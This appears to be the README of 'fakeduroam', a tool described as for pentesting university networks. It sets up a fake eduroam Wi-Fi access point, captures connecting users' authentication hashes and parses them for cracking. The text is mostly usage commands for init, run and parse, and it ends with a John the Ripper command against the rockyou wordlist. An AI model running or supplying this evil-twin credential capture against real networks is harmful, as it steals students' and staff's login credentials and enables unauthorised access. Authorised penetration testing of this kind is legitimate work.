A tool for pentesting careless universities' networks.
You will need to have macchanger
and make
installed.
Simply run:
$ sudo ./fakeduroam init
Configure your network interface, log directory and SSID in the script (default is eduroam
).
$ sudo ./fakeduroam run
Parse the captured hashes:
$ sudo ./fakeduroam parse jtr # or hashcat
The resulting hashes will be saved in hashes.txt
inside of your specified log directory.
Example John The Ripper command:
$ john hashes.txt --wordlist=rockyou.txt